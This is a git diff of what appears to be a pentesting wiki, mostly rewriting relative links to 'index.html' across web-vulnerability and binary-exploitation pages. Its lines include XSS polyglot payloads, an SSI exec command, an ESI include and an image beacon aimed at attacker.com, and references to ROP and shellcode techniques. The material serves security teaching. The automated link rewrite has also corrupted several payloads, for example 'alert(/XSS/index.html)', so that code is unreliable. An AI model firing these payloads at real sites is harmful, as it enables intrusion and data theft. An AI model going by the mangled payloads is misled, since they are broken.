';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
```
@ -108,7 +108,7 @@ $(ls)
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
```
## [File Inclusion/Path Traversal](../file-inclusion/)
## [File Inclusion/Path Traversal](../file-inclusion/index.html)
### Basic Tests
@ -125,7 +125,7 @@ http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
```
## [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery/)
## [Open Redirect](../open-redirect.md) / [Server Side Request Forgery](../ssrf-server-side-request-forgery/index.html)
### Basic Tests
@ -164,11 +164,11 @@ x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/C
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
```
## [Server Side Request Forgery](../ssrf-server-side-request-forgery/)
## [Server Side Request Forgery](../ssrf-server-side-request-forgery/index.html)
The same tests used for Open Redirect can be used here.
## [Server Side Template Injection](../ssti-server-side-template-injection/)
## [Server Side Template Injection](../ssti-server-side-template-injection/index.html)
### Basic Tests
@ -218,7 +218,7 @@ javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/index.html) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*

2
src/pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md
View File

@ -37,7 +37,7 @@ javascript:alert(1)
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/index.html) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
```

4
src/pentesting-web/postmessage-vulnerabilities/README.md
View File

@ -226,8 +226,8 @@ Example of an exploit to abuse **Prototype Pollution and then XSS** through a `p
For **more information**:
- Link to page about [**prototype pollution**](../deserialization/nodejs-proto-prototype-pollution/)
- Link to page about [**XSS**](../xss-cross-site-scripting/)
- Link to page about [**prototype pollution**](../deserialization/nodejs-proto-prototype-pollution/index.html)
- Link to page about [**XSS**](../xss-cross-site-scripting/index.html)
- Link to page about [**client side prototype pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/index.html#client-side-prototype-pollution-to-xss)
## References

6
src/pentesting-web/sql-injection/README.md
View File

@ -269,7 +269,7 @@ a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DO
## Automated Exploitation
Check the [SQLMap Cheatsheet](sqlmap/) to exploit a SQLi vulnerability with [**sqlmap**](https://github.com/sqlmapproject/sqlmap).
Check the [SQLMap Cheatsheet](sqlmap/index.html) to exploit a SQLi vulnerability with [**sqlmap**](https://github.com/sqlmapproject/sqlmap).
## Tech specific info
@ -277,9 +277,9 @@ We have already discussed all the ways to exploit a SQL Injection vulnerability.
- [MS Access](ms-access-sql-injection.md)
- [MSSQL](mssql-injection.md)
- [MySQL](mysql-injection/)
- [MySQL](mysql-injection/index.html)
- [Oracle](oracle-injection.md)
- [PostgreSQL](postgresql-injection/)
- [PostgreSQL](postgresql-injection/index.html)
Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)

34
src/pentesting-web/web-vulnerabilities-methodology.md
View File

@ -11,7 +11,7 @@ In every Web Pentest, there are **several hidden and obvious places that might b
> Nowadays **web** **applications** usually **uses** some kind of **intermediary** **proxies**, those may be (ab)used to exploit vulnerabilities. These vulnerabilities need a vulnerable proxy to be in place, but they usually also need some extra vulnerability in the backend.
- [ ] [**Abusing hop-by-hop headers**](abusing-hop-by-hop-headers.md)
- [ ] [**Cache Poisoning/Cache Deception**](cache-deception/)
- [ ] [**Cache Poisoning/Cache Deception**](cache-deception/index.html)
- [ ] [**HTTP Request Smuggling**](http-request-smuggling/)
- [ ] [**H2C Smuggling**](h2c-smuggling.md)
- [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)
@ -32,18 +32,18 @@ If the introduced data may somehow be reflected in the response, the page might
- [ ] [**Client Side Template Injection**](client-side-template-injection-csti.md)
- [ ] [**Command Injection**](command-injection.md)
- [ ] [**CRLF**](crlf-0d-0a.md)
- [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection/)
- [ ] [**File Inclusion/Path Traversal**](file-inclusion/)
- [ ] [**Dangling Markup**](dangling-markup-html-scriptless-injection/index.html)
- [ ] [**File Inclusion/Path Traversal**](file-inclusion/index.html)
- [ ] [**Open Redirect**](open-redirect.md)
- [ ] [**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/index.html#client-side-prototype-pollution-to-xss)
- [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)
- [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/)
- [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)
- [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/index.html)
- [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/index.html)
- [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)
- [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
- [ ] [**XSS**](xss-cross-site-scripting/)
- [ ] [**XSS**](xss-cross-site-scripting/index.html)
- [ ] [**XSSI**](xssi-cross-site-script-inclusion.md)
- [ ] [**XS-Search**](xs-search/)
- [ ] [**XS-Search**](xs-search/index.html)
Some of the mentioned vulnerabilities require special conditions, others just require the content to be reflected. You can find some interesting polygloths to test quickly the vulnerabilities in:
@ -55,11 +55,11 @@ pocs-and-polygloths-cheatsheet/
If the functionality may be used to search some kind of data inside the backend, maybe you can (ab)use it to search arbitrary data.
- [ ] [**File Inclusion/Path Traversal**](file-inclusion/)
- [ ] [**File Inclusion/Path Traversal**](file-inclusion/index.html)
- [ ] [**NoSQL Injection**](nosql-injection.md)
- [ ] [**LDAP Injection**](ldap-injection.md)
- [ ] [**ReDoS**](regular-expression-denial-of-service-redos.md)
- [ ] [**SQL Injection**](sql-injection/)
- [ ] [**SQL Injection**](sql-injection/index.html)
- [ ] [**XPATH Injection**](xpath-injection.md)
### **Forms, WebSockets and PostMsgs**
@ -68,15 +68,15 @@ When a websocket posts a message or a form allowing users to perform actions vul
- [ ] [**Cross Site Request Forgery**](csrf-cross-site-request-forgery.md)
- [ ] [**Cross-site WebSocket hijacking (CSWSH)**](websocket-attacks.md)
- [ ] [**PostMessage Vulnerabilities**](postmessage-vulnerabilities/)
- [ ] [**PostMessage Vulnerabilities**](postmessage-vulnerabilities/index.html)
### **HTTP Headers**
Depending on the HTTP headers given by the web server some vulnerabilities might be present.
- [ ] [**Clickjacking**](clickjacking.md)
- [ ] [**Content Security Policy bypass**](content-security-policy-csp-bypass/)
- [ ] [**Cookies Hacking**](hacking-with-cookies/)
- [ ] [**Content Security Policy bypass**](content-security-policy-csp-bypass/index.html)
- [ ] [**Cookies Hacking**](hacking-with-cookies/index.html)
- [ ] [**CORS - Misconfigurations & Bypass**](cors-bypass.md)
### **Bypasses**
@ -86,7 +86,7 @@ There are several specific functionalities where some workarounds might be usefu
- [ ] [**2FA/OTP Bypass**](2fa-bypass.md)
- [ ] [**Bypass Payment Process**](bypass-payment-process.md)
- [ ] [**Captcha Bypass**](captcha-bypass.md)
- [ ] [**Login Bypass**](login-bypass/)
- [ ] [**Login Bypass**](login-bypass/index.html)
- [ ] [**Race Condition**](race-condition.md)
- [ ] [**Rate Limit Bypass**](rate-limit-bypass.md)
- [ ] [**Reset Forgotten Password Bypass**](reset-password.md)
@ -97,7 +97,7 @@ There are several specific functionalities where some workarounds might be usefu
Some functionalities will require the **data to be structured in a very specific format** (like a language serialized object or XML). Therefore, it's easier to identify if the application might be vulnerable as it needs to be processing that kind of data.\
Some **specific functionalities** may be also vulnerable if a **specific format of the input is used** (like Email Header Injections).
- [ ] [**Deserialization**](deserialization/)
- [ ] [**Deserialization**](deserialization/index.html)
- [ ] [**Email Header Injection**](email-injections.md)
- [ ] [**JWT Vulnerabilities**](hacking-jwt-json-web-tokens.md)
- [ ] [**XML External Entity**](xxe-xee-xml-external-entity.md)
@ -108,7 +108,7 @@ Functionalities that allow uploading files might be vulnerable to several issues
Functionalities that generate files including user input might execute unexpected code.\
Users that open files uploaded by users or automatically generated including user input might be compromised.
- [ ] [**File Upload**](file-upload/)
- [ ] [**File Upload**](file-upload/index.html)
- [ ] [**Formula Injection**](formula-csv-doc-latex-ghostscript-injection.md)
- [ ] [**PDF Injection**](xss-cross-site-scripting/pdf-injection.md)
- [ ] [**Server Side XSS**](xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
@ -116,7 +116,7 @@ Users that open files uploaded by users or automatically generated including use
### **External Identity Management**
- [ ] [**OAUTH to Account takeover**](oauth-to-account-takeover.md)
- [ ] [**SAML Attacks**](saml-attacks/)
- [ ] [**SAML Attacks**](saml-attacks/index.html)
### **Other Helpful Vulnerabilities**
@ -125,7 +125,7 @@ These vulnerabilities might help to exploit other vulnerabilities.
- [ ] [**Domain/Subdomain takeover**](domain-subdomain-takeover.md)
- [ ] [**IDOR**](idor.md)
- [ ] [**Parameter Pollution**](parameter-pollution.md)
- [ ] [**Unicode Normalization vulnerability**](unicode-injection/)
- [ ] [**Unicode Normalization vulnerability**](unicode-injection/index.html)
{{#include ../banners/hacktricks-training.md}}

32
src/pentesting-web/web-vulnerabilities-methodology/README.md
View File

@ -11,7 +11,7 @@ In every Web Pentest, there are **several hidden and obvious places that might b
- [ ] [**Abusing hop-by-hop headers**](../abusing-hop-by-hop-headers.md)
- [ ] [**Cache Poisoning/Cache Deception**](../cache-deception.md)
- [ ] [**HTTP Request Smuggling**](../http-request-smuggling/)
- [ ] [**HTTP Request Smuggling**](../http-request-smuggling/index.html)
- [ ] [**H2C Smuggling**](../h2c-smuggling.md)
- [ ] [**Server Side Inclusion/Edge Side Inclusion**](../server-side-inclusion-edge-side-inclusion-injection.md)
- [ ] [**Uncovering Cloudflare**](../../network-services-pentesting/pentesting-web/uncovering-cloudflare.md)
@ -31,16 +31,16 @@ If the introduced data may somehow be reflected in the response, the page might
- [ ] [**Client Side Template Injection**](../client-side-template-injection-csti.md)
- [ ] [**Command Injection**](../command-injection.md)
- [ ] [**CRLF**](../crlf-0d-0a.md)
- [ ] [**Dangling Markup**](../dangling-markup-html-scriptless-injection/)
- [ ] [**File Inclusion/Path Traversal**](../file-inclusion/)
- [ ] [**Dangling Markup**](../dangling-markup-html-scriptless-injection/index.html)
- [ ] [**File Inclusion/Path Traversal**](../file-inclusion/index.html)
- [ ] [**Open Redirect**](../open-redirect.md)
- [ ] [**Prototype Pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/index.html#client-side-prototype-pollution-to-xss)
- [ ] [**Server Side Inclusion/Edge Side Inclusion**](../server-side-inclusion-edge-side-inclusion-injection.md)
- [ ] [**Server Side Request Forgery**](../ssrf-server-side-request-forgery/)
- [ ] [**Server Side Template Injection**](../ssti-server-side-template-injection/)
- [ ] [**Server Side Request Forgery**](../ssrf-server-side-request-forgery/index.html)
- [ ] [**Server Side Template Injection**](../ssti-server-side-template-injection/index.html)
- [ ] [**Reverse Tab Nabbing**](../reverse-tab-nabbing.md)
- [ ] [**XSLT Server Side Injection**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
- [ ] [**XSS**](../xss-cross-site-scripting/)
- [ ] [**XSS**](../xss-cross-site-scripting/index.html)
- [ ] [**XSSI**](../xssi-cross-site-script-inclusion.md)
- [ ] [**XS-Search**](../xs-search.md)
@ -54,11 +54,11 @@ Some of the mentioned vulnerabilities require special conditions, others just re
If the functionality may be used to search some kind of data inside the backend, maybe you can (ab)use it to search arbitrary data.
- [ ] [**File Inclusion/Path Traversal**](../file-inclusion/)
- [ ] [**File Inclusion/Path Traversal**](../file-inclusion/index.html)
- [ ] [**NoSQL Injection**](../nosql-injection.md)
- [ ] [**LDAP Injection**](../ldap-injection.md)
- [ ] [**ReDoS**](../regular-expression-denial-of-service-redos.md)
- [ ] [**SQL Injection**](../sql-injection/)
- [ ] [**SQL Injection**](../sql-injection/index.html)
- [ ] [**XPATH Injection**](../xpath-injection.md)
### **Forms, WebSockets and PostMsgs**
@ -67,15 +67,15 @@ When a websocket posts a message or a form allowing users to perform actions vul
- [ ] [**Cross Site Request Forgery**](../csrf-cross-site-request-forgery.md)
- [ ] [**Cross-site WebSocket hijacking (CSWSH)**](../websocket-attacks.md)
- [ ] [**PostMessage Vulnerabilities**](../postmessage-vulnerabilities/)
- [ ] [**PostMessage Vulnerabilities**](../postmessage-vulnerabilities/index.html)
### **HTTP Headers**
Depending on the HTTP headers given by the web server some vulnerabilities might be present.
- [ ] [**Clickjacking**](../clickjacking.md)
- [ ] [**Content Security Policy bypass**](../content-security-policy-csp-bypass/)
- [ ] [**Cookies Hacking**](../hacking-with-cookies/)
- [ ] [**Content Security Policy bypass**](../content-security-policy-csp-bypass/index.html)
- [ ] [**Cookies Hacking**](../hacking-with-cookies/index.html)
- [ ] [**CORS - Misconfigurations & Bypass**](../cors-bypass.md)
### **Bypasses**
@ -85,7 +85,7 @@ There are several specific functionalities where some workarounds might be usefu
- [ ] [**2FA/OTP Bypass**](../2fa-bypass.md)
- [ ] [**Bypass Payment Process**](../bypass-payment-process.md)
- [ ] [**Captcha Bypass**](../captcha-bypass.md)
- [ ] [**Login Bypass**](../login-bypass/)
- [ ] [**Login Bypass**](../login-bypass/index.html)
- [ ] [**Race Condition**](../race-condition.md)
- [ ] [**Rate Limit Bypass**](../rate-limit-bypass.md)
- [ ] [**Reset Forgotten Password Bypass**](../reset-password.md)
@ -96,7 +96,7 @@ There are several specific functionalities where some workarounds might be usefu
Some functionalities will require the **data to be structured in a very specific format** (like a language serialized object or XML). Therefore, it's easier to identify if the application might be vulnerable as it needs to be processing that kind of data.\
Some **specific functionalities** may be also vulnerable if a **specific format of the input is used** (like Email Header Injections).
- [ ] [**Deserialization**](../deserialization/)
- [ ] [**Deserialization**](../deserialization/index.html)
- [ ] [**Email Header Injection**](../email-injections.md)
- [ ] [**JWT Vulnerabilities**](../hacking-jwt-json-web-tokens.md)
- [ ] [**XML External Entity**](../xxe-xee-xml-external-entity.md)
@ -107,7 +107,7 @@ Functionalities that allow uploading files might be vulnerable to several issues
Functionalities that generate files including user input might execute unexpected code.\
Users that open files uploaded by users or automatically generated including user input might be compromised.
- [ ] [**File Upload**](../file-upload/)
- [ ] [**File Upload**](../file-upload/index.html)
- [ ] [**Formula Injection**](../formula-csv-doc-latex-ghostscript-injection.md)
- [ ] [**PDF Injection**](../xss-cross-site-scripting/pdf-injection.md)
- [ ] [**Server Side XSS**](../xss-cross-site-scripting/server-side-xss-dynamic-pdf.md)
@ -115,7 +115,7 @@ Users that open files uploaded by users or automatically generated including use
### **External Identity Management**
- [ ] [**OAUTH to Account takeover**](../oauth-to-account-takeover.md)
- [ ] [**SAML Attacks**](../saml-attacks/)
- [ ] [**SAML Attacks**](../saml-attacks/index.html)
### **Other Helpful Vulnerabilities**
@ -124,7 +124,7 @@ These vulnerabilities might help to exploit other vulnerabilities.
- [ ] [**Domain/Subdomain takeover**](../domain-subdomain-takeover.md)
- [ ] [**IDOR**](../idor.md)
- [ ] [**Parameter Pollution**](../parameter-pollution.md)
- [ ] [**Unicode Normalization vulnerability**](../unicode-injection/)
- [ ] [**Unicode Normalization vulnerability**](../unicode-injection/index.html)
{{#include ../../banners/hacktricks-training.md}}

6
src/pentesting-web/xss-cross-site-scripting/README.md
View File

@ -11,7 +11,7 @@
2. Can you use events or attributes supporting `javascript:` protocol?
3. Can you bypass protections?
4. Is the HTML content being interpreted by any client side JS engine (_AngularJS_, _VueJS_, _Mavo_...), you could abuse a [**Client Side Template Injection**](../client-side-template-injection-csti.md).
5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/)?
5. If you cannot create HTML tags that execute JS code, could you abuse a [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/index.html)?
2. Inside a **HTML tag**:
1. Can you exit to raw HTML context?
2. Can you create new events/attributes to execute JS code?
@ -257,7 +257,7 @@ If in order to exploit the vulnerability you need the **user to click a link or
### Impossible - Dangling Markup
If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection/)because you could **exploit** the vulnerability **without** executing **JS** code.
If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection/index.html)because you could **exploit** the vulnerability **without** executing **JS** code.
## Injecting inside HTML tag
@ -1056,7 +1056,7 @@ eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequir
// use of with
with(console)log(123)
with(/console.log(1)/)with(this)with(constructor)constructor(source)()
with(/console.log(1)/index.html)with(this)with(constructor)constructor(source)()
// Just replace console.log(1) to the real code, the code we want to run is:
//return String(process.mainModule.require('fs').readFileSync('flag.txt'))

2
src/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
View File

@ -159,7 +159,7 @@ for(let i=0; i<1000; i++) {
<img src="https://attacker.com/startingScan">
```
### [SSRF](../ssrf-server-side-request-forgery/)
### [SSRF](../ssrf-server-side-request-forgery/index.html)
This vulnerability can be transformed very easily in a SSRF (as you can make the script load external resources). So just try to exploit it (read some metadata?).

2
src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
View File

@ -70,7 +70,7 @@ Payloads example:
<div
id="1
![](contenteditable/autofocus/onfocus=confirm('qwq')//)">
![](contenteditable/autofocus/onfocus=confirm('qwq')//index.html)">
-----------------------------------------------
<a
title="a

2
src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md
View File

@ -9,7 +9,7 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter
## Bypasses
- It's possible to use techniques such as [**ROP**](../stack-overflow/rop-return-oriented-programing.md) to bypass this protection by executing chunks of executable code already present in the binary.
- [**Ret2libc**](../stack-overflow/ret2lib/)
- [**Ret2libc**](../stack-overflow/ret2lib/index.html)
- [**Ret2syscall**](../stack-overflow/rop-syscall-execv.md)
- **Ret2...**

2
src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md
View File

@ -23,7 +23,7 @@ In order to bypass PIE it's needed to **leak some address of the loaded** binary
bypassing-canary-and-pie.md
{{#endref}}
- Use an arbitrary read vulnerability such as [**format string**](../../format-strings/) to leak an address of the binary (e.g. from the stack, like in the previous technique) to get the base of the binary and use offsets from there. [**Find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass).
- Use an arbitrary read vulnerability such as [**format string**](../../format-strings/index.html) to leak an address of the binary (e.g. from the stack, like in the previous technique) to get the base of the binary and use offsets from there. [**Find an example here**](https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-bypass).
## References

2
src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md
View File

@ -62,7 +62,7 @@ However, in other scenarios maybe just **overwriting some variables values in th
### Ret2win
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called:
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) would be disabled) so when the vulnerable function returns, the hidden function will be called:
{{#ref}}
ret2win.md

2
src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md
View File

@ -77,7 +77,7 @@ print(p.recvline()) # should receive "Awesome work!"
### Why Not Just Use libc Directly?
Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**.
Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/index.html), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**.
{{#include ../../../banners/hacktricks-training.md}}

4
src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md
View File

@ -6,7 +6,7 @@
**Because the ESP (Stack Pointer) always points to the top of the stack**, this technique involves replacing the EIP (Instruction Pointer) with the address of a **`jmp esp`** or **`call esp`** instruction. By doing this, the shellcode is placed right after the overwritten EIP. When the `ret` instruction executes, ESP points to the next address, precisely where the shellcode is stored.
If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/)).
If **Address Space Layout Randomization (ASLR)** is not enabled in Windows or Linux, it's possible to use `jmp esp` or `call esp` instructions found in shared libraries. However, with [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) active, one might need to look within the vulnerable program itself for these instructions (and you might need to defeat [**PIE**](../common-binary-protections-and-bypasses/pie/index.html)).
Moreover, being able to place the shellcode **after the EIP corruption**, rather than in the middle of the stack, ensures that any `push` or `pop` instructions executed during the function's operation don't interfere with the shellcode. This interference could happen if the shellcode were placed in the middle of the function's stack.
@ -56,7 +56,7 @@ You can find an example here: [https://ir0nstone.gitbook.io/notes/types/stack/re
## Protections
- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md): If the stack isn't executable this won't help as we need to place the shellcode in the stack and jump to execute it.
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) & [**PIE**](../common-binary-protections-and-bypasses/pie/): Those can make harder to find a instruction to jump to esp or any other register.
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) & [**PIE**](../common-binary-protections-and-bypasses/pie/index.html): Those can make harder to find a instruction to jump to esp or any other register.
## References

4
src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md
View File

@ -77,8 +77,8 @@ The Python script sends a carefully crafted message that, when processed by the
## Protections
- [**PIE**](../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
- [**PIE**](../common-binary-protections-and-bypasses/pie/index.html) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/index.html) should be also disabled or the compromised EIP return address won't never be followed.
## Other examples & References

6
src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md
View File

@ -37,7 +37,7 @@ First, let's assume we've identified the necessary gadgets within the binary or
Using **pwntools**, we prepare the stack for the ROP chain execution as follows aiming to execute `system('/bin/sh')`, note how the chain starts with:
1. A `ret` instruction for alignment purposes (optional)
2. Address of `system` function (supposing ASLR disabled and known libc, more info in [**Ret2lib**](ret2lib/))
2. Address of `system` function (supposing ASLR disabled and known libc, more info in [**Ret2lib**](ret2lib/index.html))
3. Placeholder for the return address from `system()`
4. `"/bin/sh"` string address (parameter for system function)
@ -148,8 +148,8 @@ In this example:
## Protections
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/)
- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/)
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html)
- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/index.html)
## Other Examples & References

2
src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md
View File

@ -53,7 +53,7 @@ Now, the **`ESP`** is controlled pointing to a desired address and the next inst
Basically this way it's possible to chain several fake EBPs to control the flow of the program.
This is like a [ret2lib](ret2lib/), but more complex with no apparent benefit but could be interesting in some edge-cases.
This is like a [ret2lib](ret2lib/index.html), but more complex with no apparent benefit but could be interesting in some edge-cases.
Moreover, here you have an [**example of a challenge**](https://ir0nstone.gitbook.io/notes/types/stack/stack-pivoting/exploitation/leave) that uses this technique with a **stack leak** to call a winning function. This is the final payload from the page:

4
src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md
View File

@ -78,8 +78,8 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w
## Protections
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/index.html) should be also disabled or the compromised EIP return address won't never be followed.
- [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable.
## Other Examples & References

4
src/stealing-sensitive-information-disclosure-from-a-web.md
View File

@ -6,8 +6,8 @@ If at some point you find a **web page that presents you sensitive information b
Here I present you the main ways to can try to achieve it:
- [**CORS bypass**](pentesting-web/cors-bypass.md): If you can bypass CORS headers you will be able to steal the information performing Ajax request for a malicious page.
- [**XSS**](pentesting-web/xss-cross-site-scripting/): If you find a XSS vulnerability on the page you may be able to abuse it to steal the information.
